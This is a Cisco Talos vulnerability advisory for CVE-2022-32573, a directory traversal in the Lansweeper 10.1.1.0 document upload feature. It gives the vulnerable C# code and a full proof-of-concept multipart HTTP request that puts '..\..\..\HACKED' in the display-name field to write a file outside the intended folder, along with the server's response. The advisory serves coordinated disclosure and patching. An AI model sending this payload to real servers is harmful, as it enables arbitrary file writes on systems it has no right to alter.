Talos Vulnerability Report

TALOS-2022-1528

Lansweeper lansweeper AssetActions.aspx directory traversal vulnerability

December 1, 2022
CVE Number

CVE-2022-32573

SUMMARY

A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

PRODUCT URLS

lansweeper - https://www.lansweeper.com/

CVSSv3 SCORE

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Assets -> choose any asset -> Docs -> Add document and is located inside the \LS\WS\AssetActions.cs file. Let us take a close look at the vulnerable source code :

Line 1 	else if (page.IsPostBack && current.Request["action"] == "addDoc")
Line 2 	{
Line 3 
Line 4 		if (fileup.PostedFile != null && fileup.PostedFile.ContentLength > 0)
Line 5 		{
Line 6 			string text5 = Path.GetFileName(fileup.PostedFile.FileName);
Line 7 			string text6 = Guid.NewGuid().ToString();
Line 8 			int value6 = int.Parse(current.Request["assetId"]);
Line 9 			string item = DateTime.Now.ToString(User.Current().DateTimeFormat);
Line 10			WebUser webUser2 = (WebUser)current.Session["Webuser"];
Line 11			string text7 = ((!webUser2.IsAuthenticated) ? webUser2.Displayname : (webUser2.UserDomain + "\\" + webUser2.UserName));
Line 12			string[] allowedExtensions = General.AllowedExtensions;
Line 13			string text8 = Path.GetExtension(fileup.FileName).ToLower();
Line 14			if (txtdocname.Text != "")
Line 15			{
Line 16				text5 = txtdocname.Text + text8;
Line 17			}
Line 18			bool flag = false;
Line 19			string[] array = allowedExtensions;
Line 20			for (int i = 0; i < array.Length; i++)
Line 21			{
Line 22				if (array[i] == text8)
Line 23				{
Line 24					flag = true;
Line 25				}
Line 26			}
Line 27			string text9 = HttpContext.Current.Server.MapPath("~") + "\\DOCS\\";
Line 28			string filename = text9 + text6 + "_" + text5;
Line 29			if (!Directory.Exists(text9))
Line 30			{
Line 31				Directory.CreateDirectory(text9);
Line 32			}
Line 33			try
Line 34			{
Line 35				if (!flag)
Line 36				{
Line 37					text4 = text4 + "file extension ('" + text8 + "') is not allowed.";
Line 38					throw new CustomException(text4);
Line 39				}
Line 40				fileup.PostedFile.SaveAs(filename);

Uploading a file (document), an attacker can use the txtdocname (Display name in web GUI) variable to provide an alternative filename which is not sanitized at all in a context of directory traversal. Next, that name is concatenated in a simple way with a path to DOCS directory lines 27-28. Lack of proper txtdocname sanitization allows an attacker to upload a file to an arbitrary destination within the file system.

Exploit Proof of Concept

REQUEST

POST /AssetActions.aspx?action=addDoc&assetId=10 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23614898975253108242957970650
Content-Length: 644
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/AssetActions.aspx?action=addDoc&assetId=10
Cookie: UserSettings=language=1; ASP.NET_SessionId=etcnsycpe3rytjmue2efl5co; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
Upgrade-Insecure-Requests: 1

-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="__VIEWSTATE"


-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="fileup"; filename="doc_name_ppt.magicext.ini"
Content-Type: application/vnd.ms-powerpoint

ATTACKER CONTROLED CONTENT
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="txtdocname"

..\..\..\HACKED
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="btnOK"

Upload
-----------------------------23614898975253108242957970650--

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 06 Jun 2022 14:53:18 GMT
Connection: close
Content-Length: 159

<script>window.parent.closeIframe(["10","..\\..\\..\\HACKED.ini","6405c669-95ed-4469-bb1a-ae4665868d1a","..\\Unauthenticated","06/06/2022 16:53:18"]);</script>
TIMELINE

2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.